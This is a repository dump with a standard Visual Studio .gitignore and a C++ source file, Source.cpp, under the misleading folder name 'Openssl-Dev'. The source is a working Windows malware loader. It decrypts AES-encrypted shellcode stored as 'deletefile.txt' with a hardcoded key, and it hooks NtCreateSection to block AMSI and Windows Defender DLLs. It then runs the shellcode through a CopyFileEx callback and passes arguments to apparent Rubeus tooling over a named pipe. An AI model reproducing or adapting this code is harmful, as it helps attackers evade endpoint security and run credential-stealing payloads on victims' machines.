 58 | # Benchmark Results
 59 | BenchmarkDotNet.Artifacts/
 60 | 
 61 | # .NET Core
 62 | project.lock.json
 63 | project.fragment.lock.json
 64 | artifacts/
 65 | 
 66 | # ASP.NET Scaffolding
 67 | ScaffoldingReadMe.txt
 68 | 
 69 | # StyleCop
 70 | StyleCopReport.xml
 71 | 
 72 | # Files built by Visual Studio
 73 | *_i.c
 74 | *_p.c
 75 | *_h.h
 76 | *.ilk
 77 | *.meta
 78 | *.obj
 79 | *.iobj
 80 | *.pch
 81 | *.pdb
 82 | *.ipdb
 83 | *.pgc
 84 | *.pgd
 85 | *.rsp
 86 | *.sbr
 87 | *.tlb
 88 | *.tli
 89 | *.tlh
 90 | *.tmp
 91 | *.tmp_proj
 92 | *_wpftmp.csproj
 93 | *.log
 94 | *.vspscc
 95 | *.vssscc
 96 | .builds
 97 | *.pidb
 98 | *.svclog
 99 | *.scc
100 | 
101 | # Chutzpah Test files
102 | _Chutzpah*
103 | 
104 | # Visual C++ cache files
105 | ipch/
106 | *.aps
107 | *.ncb
108 | *.opendb
109 | *.opensdf
110 | *.sdf
111 | *.cachefile
112 | *.VC.db
113 | *.VC.VC.opendb
114 | 
115 | # Visual Studio profiler
116 | *.psess
117 | *.vsp
118 | *.vspx
119 | *.sap
120 | 
121 | # Visual Studio Trace Files
122 | *.e2e
123 | 
124 | # TFS 2012 Local Workspace
125 | $tf/
126 | 
127 | # Guidance Automation Toolkit
128 | *.gpState
129 | 
130 | # ReSharper is a .NET coding add-in
131 | _ReSharper*/
132 | *.[Rr]e[Ss]harper
133 | *.DotSettings.user
134 | 
135 | # TeamCity is a build add-in
136 | _TeamCity*
137 | 
138 | # DotCover is a Code Coverage Tool
139 | *.dotCover
140 | 
141 | # AxoCover is a Code Coverage Tool
142 | .axoCover/*
143 | !.axoCover/settings.json
144 | 
145 | # Coverlet is a free, cross platform Code Coverage Tool
146 | coverage*.json
147 | coverage*.xml
148 | coverage*.info
149 | 
150 | # Visual Studio code coverage results
151 | *.coverage
152 | *.coveragexml
153 | 
154 | # NCrunch
155 | _NCrunch_*
156 | .*crunch*.local.xml
157 | nCrunchTemp_*
158 | 
159 | # MightyMoose
160 | *.mm.*
161 | AutoTest.Net/
162 | 
163 | # Web workbench (sass)
164 | .sass-cache/
165 | 
166 | # Installshield output folder
167 | [Ee]xpress/
168 | 
169 | # DocProject is a documentation generator add-in
170 | DocProject/buildhelp/
171 | DocProject/Help/*.HxT
172 | DocProject/Help/*.HxC
173 | DocProject/Help/*.hhc
174 | DocProject/Help/*.hhk
175 | DocProject/Help/*.hhp
176 | DocProject/Help/Html2
177 | DocProject/Help/html
178 | 
179 | # Click-Once directory
180 | publish/
181 | 
182 | # Publish Web Output
183 | *.[Pp]ublish.xml
184 | *.azurePubxml
185 | # Note: Comment the next line if you want to checkin your web deploy settings,
186 | # but database connection strings (with potential passwords) will be unencrypted
187 | *.pubxml
188 | *.publishproj
189 | 
190 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
191 | # checkin your Azure Web App publish settings, but sensitive information contained
192 | # in these scripts will be unencrypted
193 | PublishScripts/
194 | 
195 | # NuGet Packages
196 | *.nupkg
197 | # NuGet Symbol Packages
198 | *.snupkg
199 | # The packages folder can be ignored because of Package Restore
200 | **/[Pp]ackages/*
201 | # except build/, which is used as an MSBuild target.
202 | !**/[Pp]ackages/build/
203 | # Uncomment if necessary however generally it will be regenerated when needed
204 | #!**/[Pp]ackages/repositories.config
205 | # NuGet v3's project.json files produces more ignorable files
206 | *.nuget.props
207 | *.nuget.targets
208 | 
209 | # Microsoft Azure Build Output
210 | csx/
211 | *.build.csdef
212 | 
213 | # Microsoft Azure Emulator
214 | ecf/
215 | rcf/
216 | 
217 | # Windows Store app package directories and files
218 | AppPackages/
219 | BundleArtifacts/
220 | Package.StoreAssociation.xml
221 | _pkginfo.txt
222 | *.appx
223 | *.appxbundle
224 | *.appxupload
225 | 
226 | # Visual Studio cache files
227 | # files ending in .cache can be ignored
228 | *.[Cc]ache
229 | # but keep track of directories ending in .cache
230 | !?*.[Cc]ache/
231 | 
232 | # Others
233 | ClientBin/
234 | ~$*
235 | *~
236 | *.dbmdl
237 | *.dbproj.schemaview
238 | *.jfm
239 | *.pfx
240 | *.publishsettings
241 | orleans.codegen.cs
242 | 
243 | # Including strong name files can present a security risk
244 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
245 | #*.snk
246 | 
247 | # Since there are multiple workflows, uncomment next line to ignore bower_components
248 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
249 | #bower_components/
250 | 
251 | # RIA/Silverlight projects
252 | Generated_Code/
253 | 
254 | # Backup & report files from converting an old project file
255 | # to a newer Visual Studio version. Backup files are not needed,
256 | # because we have git ;-)
257 | _UpgradeReport_Files/
258 | Backup*/
259 | UpgradeLog*.XML
260 | UpgradeLog*.htm
261 | ServiceFabricBackup/
262 | *.rptproj.bak
263 | 
264 | # SQL Server files
265 | *.mdf
266 | *.ldf
267 | *.ndf
268 | 
269 | # Business Intelligence projects
270 | *.rdl.data
271 | *.bim.layout
272 | *.bim_*.settings
273 | *.rptproj.rsuser
274 | *- [Bb]ackup.rdl
275 | *- [Bb]ackup ([0-9]).rdl
276 | *- [Bb]ackup ([0-9][0-9]).rdl
277 | 
278 | # Microsoft Fakes
279 | FakesAssemblies/
280 | 
281 | # GhostDoc plugin setting file
282 | *.GhostDoc.xml
283 | 
284 | # Node.js Tools for Visual Studio
285 | .ntvs_analysis.dat
286 | node_modules/
287 | 
288 | # Visual Studio 6 build log
289 | *.plg
290 | 
291 | # Visual Studio 6 workspace options file
292 | *.opt
293 | 
294 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
295 | *.vbw
296 | 
297 | # Visual Studio LightSwitch build output
298 | **/*.HTMLClient/GeneratedArtifacts
299 | **/*.DesktopClient/GeneratedArtifacts
300 | **/*.DesktopClient/ModelManifest.xml
301 | **/*.Server/GeneratedArtifacts
302 | **/*.Server/ModelManifest.xml
303 | _Pvt_Extensions
304 | 
305 | # Paket dependency manager
306 | .paket/paket.exe
307 | paket-files/
308 | 
309 | # FAKE - F# Make
310 | .fake/
311 | 
312 | # CodeRush personal settings
313 | .cr/personal
314 | 
315 | # Python Tools for Visual Studio (PTVS)
316 | __pycache__/
317 | *.pyc
318 | 
319 | # Cake - Uncomment if you are using it
320 | # tools/**
321 | # !tools/packages.config
322 | 
323 | # Tabs Studio
324 | *.tss
325 | 
326 | # Telerik's JustMock configuration file
327 | *.jmconfig
328 | 
329 | # BizTalk build output
330 | *.btp.cs
331 | *.btm.cs
332 | *.odx.cs
333 | *.xsd.cs
334 | 
335 | # OpenCover UI analysis results
336 | OpenCover/
337 | 
338 | # Azure Stream Analytics local run output
339 | ASALocalRun/
340 | 
341 | # MSBuild Binary and Structured Log
342 | *.binlog
343 | 
344 | # NVidia Nsight GPU debugger configuration file
345 | *.nvuser
346 | 
347 | # MFractors (Xamarin productivity tool) working folder
348 | .mfractor/
349 | 
350 | # Local History for Visual Studio
351 | .localhistory/
352 | 
353 | # BeatPulse healthcheck temp database
354 | healthchecksdb
355 | 
356 | # Backup folder for Package Reference Convert tool in Visual Studio 2017
357 | MigrationBackup/
358 | 
359 | # Ionide (cross platform F# VS Code tools) working folder
360 | .ionide/
361 | 
362 | # Fody - auto-generated XML schema
363 | FodyWeavers.xsd


--------------------------------------------------------------------------------
/Openssl-Dev/Source.cpp:
--------------------------------------------------------------------------------
  1 | #include "defs.h"
  2 | 
  3 | 
  4 | 
  5 | 
  6 | 
  7 | char* encrypter_111(const char* path, BOOL isDecrypt, LPDWORD bytes, BOOL calculate) //Function to decypher shellcode files
  8 | {
  9 | 	if (strlen(path) > MAX_PATH)
 10 | 		return 0;
 11 | 	char filename[266];
 12 | 	char filename2[260 + 6];
 13 | 	if (!isDecrypt) //This function is prepared to decrypt and also encrypt files
 14 | 	{
 15 | 
 16 | 		strcpy_s(filename, 266, path);
 17 | 		strcpy_s(filename2, 266, path);
 18 | 		strcat_s(filename2, 266, extension);
 19 | 
 20 | 	}
 21 | 	else
 22 | 	{
 23 | 		strcpy_s(filename, 266, path);
 24 | 	}
 25 | 
 26 | 
 27 | 
 28 | 	wchar_t default_key[] = L"7fwivcli7r#auzS"; //Key
 29 | 	wchar_t* key_str = default_key;
 30 | 
 31 | 	size_t len = lstrlenW(key_str); //keyLen
 32 | 
 33 | 
 34 | 	HANDLE hInpFile = CreateFileA(filename, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_FLAG_SEQUENTIAL_SCAN, NULL); //Open the file
 35 | 	if (hInpFile == INVALID_HANDLE_VALUE) {
 36 | 
 37 | 		return 0;
 38 | 	}
 39 | 
 40 | 	DWORD dwStatus = 0;
 41 | 	BOOL bResult = FALSE;
 42 | 	wchar_t info[] = L"Microsoft Enhanced RSA and AES Cryptographic Provider";
 43 | 	HCRYPTPROV hProv;
 44 | 
 45 | 	if (!CryptAcquireContextW(&hProv, NULL, info, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) { //Init cryptAPI
 46 | 		dwStatus = GetLastError();
 47 | 		return 0;
 48 | 	}
 49 | 
 50 | 	HCRYPTHASH hHash;
 51 | 	if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) { 
 52 | 		dwStatus = GetLastError();
 53 | 
 54 | 		return 0;
 55 | 	}
 56 | 
 57 | 	if (!CryptHashData(hHash, (BYTE*)key_str, len, 0)) {
 58 | 		DWORD err = GetLastError();
 59 | 
 60 | 		return 0;
 61 | 	}
 62 | 
 63 | 	HCRYPTKEY hKey;
 64 | 	if (!CryptDeriveKey(hProv, CALG_AES_128, hHash, 0, &hKey)) {
 65 | 		dwStatus = GetLastError();
 66 | 
 67 | 		return 0;
 68 | 	}
 69 | 
 70 | 
 71 | 	const size_t chunk_size = CHUNK_SIZE;
 72 | 	BYTE chunk[chunk_size] = { 0 };
 73 | 	DWORD out_len = 0;
 74 | 
 75 | 	BOOL isFinal = FALSE;
 76 | 	DWORD readTotalSize = 0;
 77 | 	DWORD inputSize = GetFileSize(hInpFile, NULL);
 78 | 	*bytes = inputSize;
 79 | 	if (calculate == TRUE) //If we use the function to calculate the size of the unencrypted shellcode
 80 | 	{
 81 | 
 82 | 		CryptReleaseContext(hProv, 0);
 83 | 		CryptDestroyKey(hKey);
 84 | 		CryptDestroyHash(hHash);
 85 | 		CloseHandle(hInpFile);
 86 | 
 87 | 		return 0;
 88 | 	}
 89 | 
 90 | 	char* buffer_alloc = (char*)malloc(inputSize + 1); //buffer for the unencrypted shellcode
 91 | 	if (!buffer_alloc)
 92 | 		return 0;
 93 | 	int i = 0;
 94 | 	while (bResult = ReadFile(hInpFile, chunk, chunk_size, &out_len, NULL)) { //Read the file to the buffer_alloc
 95 | 		if (0 == out_len) {
 96 | 			break;
 97 | 		}
 98 | 		readTotalSize += out_len;
 99 | 		if (readTotalSize == inputSize) {
100 | 			isFinal = TRUE;
101 | 		}
102 | 
103 | 		if (isDecrypt) {
104 | 			if (!CryptDecrypt(hKey, NULL, isFinal, 0, chunk, &out_len)) { //If we are decrypting
105 | 				break;
106 | 			}
107 | 		}
108 | 		else {
109 | 			if (!CryptEncrypt(hKey, NULL, isFinal, 0, chunk, &out_len, chunk_size)) { //If we are encrypting
110 | 				break;
111 | 			}
112 | 		}
113 | 		DWORD written = 0;
114 | 
115 | 		if (i != 0)
116 | 			memcpy(buffer_alloc + 80 * i, chunk, out_len); //Workaround for the size issues
117 | 		else
118 | 		{
119 | 			memcpy(buffer_alloc, chunk, out_len);
120 | 
121 | 		}
122 | 		i++;
123 | 
124 | 
125 | 		memset(chunk, 0, chunk_size);
126 | 	}
127 | 	*bytes = inputSize; //variable with the size of the shellcode
128 | 	CryptReleaseContext(hProv, 0); //Close handles
129 | 	CryptDestroyKey(hKey);
130 | 	CryptDestroyHash(hHash);
131 | 	CloseHandle(hInpFile);
132 | 
133 | 
134 | 
135 | 	return buffer_alloc; //return the shellcode
136 | 
137 | }
138 | 
139 | 
140 | 
141 | 
142 | 
143 | 
144 | 
145 | 
146 | 
147 | 
148 | char tramp_ntcreatesection[13] = {
149 | 	0x49, 0xBA, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,         // mov r10, NEW_LOC_@ddress
150 | 	0x41, 0xFF, 0xE2                                                    // jmp r10
151 | };
152 | char tramp_old_ntcreatesection[13];
153 | 
154 | 
155 | 
156 | 
157 | 
158 | 
159 | std::string data_hash[] =
160 | {
161 | 	"fbd13447dcd3ab91bb0d2324e11eca986967c99dcd324b00f9577010c6080413", //SHA256 of the UNC Path of the AMSI dll and other Windows Defender injected DLLs
162 | 	"856efe1b2c5b5716b4d373bb7205e742da90d51256371c582ce82b353d900186",
163 | 	"d8d52609d0c81d70bf44cb3cd5732a1c232cc20c25342d0a118192e652a12d98",
164 | 	"a75589e0d1b5b8f0ad28f508ed28df1b4406374ac489121c895170475fe3ef74"
165 | 
166 | 
167 | }; //array with the file hashes
168 | 
169 | 
170 | 
171 | 
172 | NTSTATUS ntCreateMySection(OUT PHANDLE SectionHandle, IN ULONG DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, IN PLARGE_INTEGER MaximumSize OPTIONAL, IN ULONG PageAttributess, IN ULONG SectionAttributes, IN HANDLE FileHandle OPTIONAL) /*Bypass AMSI*/
173 | {
174 | 	int isFinal = 0;
175 | 	char lpFilename[256];
176 | 	if (FileHandle != NULL)
177 | 	{
178 | 
179 | 		DWORD res = GetFinalPathNameByHandleA(FileHandle, lpFilename, 256, FILE_NAME_OPENED | VOLUME_NAME_DOS); //Get the file path of the file handle
180 | 		if (res == 0)
181 | 			printf("GetFinalPathNameByHandleA error: %d\n", GetLastError());
182 | 
183 | 		else
184 | 		{
185 | 			std::string hash = sha256(std::string(lpFilename)); //Compute the SHA256 hash of the file path (only the hash of the name, not the file)
186 | 			unsigned int arrSize = sizeof(data_hash) / sizeof(data_hash[0]); //Get the size of the array
187 | 			for (int counter = 0; counter < arrSize; counter++) //Loop each position of the array
188 | 			{
189 | 				if (hash.compare(data_hash[counter]) == 0) //If hash of the DLL to load is equal to any of the array hashes return 0
190 | 				{
191 | 					return 0; //If set -1, will trigger SEH exception and will show an error in the screen (but also works)
192 | 				}
193 | 			}
194 | 		}
195 | 	}
196 | 	restore_hook_ntcreatesection(SectionHandle, DesiredAccess, ObjectAttributes, MaximumSize, PageAttributess, SectionAttributes, FileHandle); //If it's not an AMSI DLL restore the original NtCreateSection
197 | 	return 1;
198 | }
199 | 
200 | 
201 | 
202 | BOOL restore_hook_ntcreatesection(OUT PHANDLE SectionHandle, IN ULONG DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, IN PLARGE_INTEGER MaximumSize OPTIONAL, IN ULONG PageAttributess, IN ULONG SectionAttributes, IN HANDLE FileHandle OPTIONAL)
203 | {
204 | 	HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, NULL, GetCurrentProcessId()); //Open current process
205 | 	myNtCreateSection NtCreate;
206 | 	NtCreate = (myNtCreateSection)GetProcAddress(GetModuleHandle("NTDLL.dll"), "NtCreateSection"); //Get address of the hooked NtCreateSection
207 | 	DWORD written2, written3;
208 | 
209 | 
210 | 	VirtualProtect(NtCreate, sizeof NtCreate, PAGE_EXECUTE_READWRITE, &written2); //Protect it 
211 | 	VirtualProtect(tramp_old_ntcreatesection, sizeof tramp_old_ntcreatesection, PAGE_EXECUTE_READWRITE, &written3);
212 | 
213 | 	if (!WriteProcessMemory(hProc, NtCreate, &tramp_old_ntcreatesection, sizeof tramp_old_ntcreatesection, NULL)) //Write the real NtCreateSection in the address of the hook
214 | 	{
215 | 		return FALSE;
216 | 	}
217 | 	NtCreate(SectionHandle, DesiredAccess, ObjectAttributes, MaximumSize, PageAttributess, SectionAttributes, FileHandle); //Call the real NtCreateSection
218 | 	hook_ntcreatesection(hProc); //hook it again
219 | 	return 1;
220 | 
221 | }
222 | 
223 | 
224 | BOOL hook_ntcreatesection(HANDLE hProc)
225 | {
226 | 	myNtCreateSection NtCreate;
227 | 	NtCreate = (myNtCreateSection)GetProcAddress(GetModuleHandle("NTDLL.dll"), "NtCreateSection"); //GetProcAddress of NtCreateSection
228 | 	if (!NtCreate)
229 | 		exit(-1);
230 | 	DWORD written3;
231 | 
232 | 
233 | 	VirtualProtect(NtCreate, sizeof NtCreate, PAGE_EXECUTE_READWRITE, &written3); //Protect it 
234 | 
235 | 	void* reference = (void*)ntCreateMySection; //pointer to ntCreateSection  (hook) in reference
236 | 
237 | 
238 | 	memcpy(tramp_old_ntcreatesection, NtCreate, sizeof tramp_old_ntcreatesection); //Copy the syscall of NtCreateSection (real) in a global variable
239 | 	memcpy(&tramp_ntcreatesection[2], &reference, sizeof reference); //Copy  the hook to tramp_ntcreatesection
240 | 
241 | 	DWORD old3;
242 | 
243 | 	VirtualProtect(tramp_ntcreatesection, sizeof tramp_ntcreatesection, PAGE_EXECUTE_READWRITE, &old3);
244 | 
245 | 
246 | 	if (!WriteProcessMemory(hProc, (LPVOID*)NtCreate, &tramp_ntcreatesection, sizeof tramp_ntcreatesection, NULL)) //Write the hook to the address of the NtCreateSection
247 | 	{
248 | 		return -1;
249 | 	}
250 | 	return 1;
251 | }
252 | 
253 | 
254 | typedef struct args {
255 | 	char** args;
256 | 	int length;
257 | } arguments;//Struct
258 | 
259 | 
260 | void manage_pipes(arguments *parameters)
261 | {
262 | 	DWORD outputBufferSize = 2056;
263 | 	HANDLE  pipeBool = CreateNamedPipe("\\\\.\\pipe\\testpipe",
264 | 		PIPE_ACCESS_DUPLEX | FILE_FLAG_FIRST_PIPE_INSTANCE | WRITE_DAC,
265 | 		PIPE_TYPE_BYTE | PIPE_READMODE_BYTE | PIPE_WAIT | PIPE_ACCEPT_REMOTE_CLIENTS,
266 | 		PIPE_UNLIMITED_INSTANCES,
267 | 		outputBufferSize,
268 | 		outputBufferSize,
269 | 		0,
270 | 		NULL
271 | 	); //Pipe for the rubeus arguments
272 | 	if (pipeBool == INVALID_HANDLE_VALUE)
273 | 	{
274 | 		return;
275 | 	}
276 | 
277 | 	BOOL isConnected = ConnectNamedPipe(pipeBool, NULL) ? TRUE : (GetLastError() == ERROR_PIPE_CONNECTED); //Connect to the Pipe
278 | 	if (isConnected) //Write to the pipe the arguments
279 | 	{
280 | 		int argc = parameters->length;
281 | 		char** argv = (char**)parameters->args;
282 | 		DWORD* bytes_written = new DWORD[argc];
283 | 		for (int args = 1; args < argc; args++)
284 | 		{
285 | 			WriteFile(pipeBool, argv[args], strlen(argv[args]), &bytes_written[args], NULL);
286 | 		}
287 | 	}
288 | 	CloseHandle(pipeBool);
289 | }
290 | 
291 | 
292 | 
293 | int main(int argc, char **argv) 
294 | {
295 | 	
296 | 
297 | 		arguments* __arguments = (arguments*)malloc(sizeof(arguments)); //Allocate space for the structure of arguments
298 | 		__arguments->args = argv; //arguments 
299 | 		__arguments->length = argc; //number of arguments
300 | 		static DWORD size = NULL;
301 | 		encrypter_111("deletefile.txt", true, &size, true); //get the size of the unencrypted shellcode
302 | 		char* shellcode = (char*)malloc(size); //allocate space for the unencrypted shellcode
303 | 		memcpy(shellcode, encrypter_111("deletefile.txt", true, &size, false), size); //copy the shellcode to the allocated array
304 | 		HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, NULL, GetCurrentProcessId()); //Open the current process
305 | 		HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)manage_pipes, (LPVOID)__arguments, 0, nullptr); //Create the thread for the pipe
306 | 		if (hThread == NULL)
307 | 		{
308 | 			free(shellcode);
309 | 			free(__arguments);
310 | 			return -1;
311 | 		}
312 | 
313 | 
314 | 		hook_ntcreatesection(hProc); //Hook the NtCreateSection
315 | 		DWORD old; //Old protection
316 | 		if (!VirtualProtect(shellcode, size, PAGE_EXECUTE_READWRITE, &old)) //Protect the shellcode array with PAGE_EXECUTE_READWRITE
317 | 			return 0;
318 | 		if (!CopyFileEx("deletefile.txt", "deletefile", (LPPROGRESS_ROUTINE)shellcode, NULL, FALSE, 0)) //Trigger the shellcode (callback)
319 | 			printf("%d\n", GetLastError());
320 | 		WaitForSingleObject(hThread, INFINITE); 
321 | 		free(__arguments);
322 | 		free(shellcode);
323 | 	
324 | 		return 0;
325 | 
326 | }


--------------------------------------------------------------------------------